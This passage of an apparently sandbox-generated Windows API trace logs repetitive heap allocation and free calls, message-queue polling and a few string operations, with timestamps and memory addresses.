Size=0x10) returned 0x29f0d68 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d28 [0085.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0d68 | out: hHeap=0x2af0000) returned 1 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79538 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0d80 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0d68 [0085.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a796c8 | out: hHeap=0x2af0000) returned 1 [0085.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c38 | out: hHeap=0x2af0000) returned 1 [0085.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.251] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a795d8 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d58 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e28 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d68 [0085.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d68 | out: hHeap=0x2af0000) returned 1 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c78 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e58 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c18 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0ea0 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c18 | out: hHeap=0x2af0000) returned 1 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0ea0 | out: hHeap=0x2af0000) returned 1 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e58 | out: hHeap=0x2af0000) returned 1 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c78 | out: hHeap=0x2af0000) returned 1 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bb8 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bb8 | out: hHeap=0x2af0000) returned 1 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0085.252] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d38 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e58 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d98 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0ea0 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0fc0 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c88 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0f60 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0fa8 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bb8 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bb8 | out: hHeap=0x2af0000) returned 1 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d68 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d68 | out: hHeap=0x2af0000) returned 1 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1050 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bb8 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bb8 | out: hHeap=0x2af0000) returned 1 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1248 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72cc8 [0085.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1308 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1008 | out: hHeap=0x2af0000) returned 1 [0085.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0fa8 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1050 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0f60 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c88 | out: hHeap=0x2af0000) returned 1 [0085.253] lstrlenW (lpString="20") returned 2 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1248 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72cc8 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1308 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0fc0 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0ea0 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d98 | out: hHeap=0x2af0000) returned 1 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0ea0 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d18 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e58 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d38 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d18 | out: hHeap=0x2af0000) returned 1 [0085.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0ea0 | out: hHeap=0x2af0000) returned 1 [0085.253] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.253] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c68 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e58 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d68 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0ea0 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0f60 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c08 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0fa8 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0fc0 [0085.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c78 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c78 | out: hHeap=0x2af0000) returned 1 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d18 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d18 | out: hHeap=0x2af0000) returned 1 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1050 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c88 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c88 | out: hHeap=0x2af0000) returned 1 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1248 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ca8 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1308 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0fc0 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1008 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1050 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0fa8 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c08 | out: hHeap=0x2af0000) returned 1 [0085.254] lstrlenW (lpString="30") returned 2 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1248 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ca8 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1308 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0f60 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0ea0 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d68 | out: hHeap=0x2af0000) returned 1 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0ea0 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0f60 [0085.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ca8 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e58 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c68 | out: hHeap=0x2af0000) returned 1 [0085.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0f60 | out: hHeap=0x2af0000) returned 1 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ca8 | out: hHeap=0x2af0000) returned 1 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0ea0 | out: hHeap=0x2af0000) returned 1 [0085.255] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.255] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d18 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e58 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c98 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0ea0 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0f60 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ce8 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0fa8 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0fc0 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d98 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d98 | out: hHeap=0x2af0000) returned 1 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1038 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bb8 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bb8 | out: hHeap=0x2af0000) returned 1 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1050 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d38 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d38 | out: hHeap=0x2af0000) returned 1 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1248 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d98 [0085.255] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1308 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1008 | out: hHeap=0x2af0000) returned 1 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0fc0 | out: hHeap=0x2af0000) returned 1 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1038 | out: hHeap=0x2af0000) returned 1 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1050 | out: hHeap=0x2af0000) returned 1 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0fa8 | out: hHeap=0x2af0000) returned 1 [0085.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ce8 | out: hHeap=0x2af0000) returned 1 [0085.255] lstrlenW (lpString="20") returned 2 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1248 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d98 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1308 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0f60 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0ea0 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c98 | out: hHeap=0x2af0000) returned 1 [0085.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0ea0 [0085.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0f60 [0085.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72bc8 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e58 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d18 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0f60 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bc8 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0ea0 | out: hHeap=0x2af0000) returned 1 [0085.256] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0085.256] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d88 [0085.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e58 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d88 | out: hHeap=0x2af0000) returned 1 [0085.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e58 | out: hHeap=0x2af0000) returned 1 [0085.256] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e58 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e70 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0930 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08e8 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a796f0 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bd8 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a793f8 | out: hHeap=0x2af0000) returned 1 [0085.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e28 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d58 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a795d8 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0d68 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0d80 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79538 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d28 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79740 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0b70 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ba8 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0828 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07e0 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d08 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07c8 | out: hHeap=0x2af0000) returned 1 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e58 | out: hHeap=0x2af0000) returned 1 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0d68 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0d80 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79538 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e28 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72c68 [0085.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0e28 | out: hHeap=0x2af0000) returned 1 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79498 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e28 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e58 [0085.257] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72cc8 [0085.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0d68 | out: hHeap=0x2af0000) returned 1 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a797e0 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72cd8 [0085.258] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a797e0 | out: hHeap=0x2af0000) returned 1 [0085.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72cd8 | out: hHeap=0x2af0000) returned 1 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0d68 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72c78 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0e70 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0ea0 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bf8 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c38 [0085.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c38 | out: hHeap=0x2af0000) returned 1 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0f60 [0085.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bf8 | out: hHeap=0x2af0000) returned 1 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f0fa8 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79808 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0fc0 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72bc8 [0085.258] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0fc0 | out: hHeap=0x2af0000) returned 1 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79830 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0fc0 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1008 [0085.258] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0085.258] PeekMessageW (in: lpMsg=0x8ceed8, 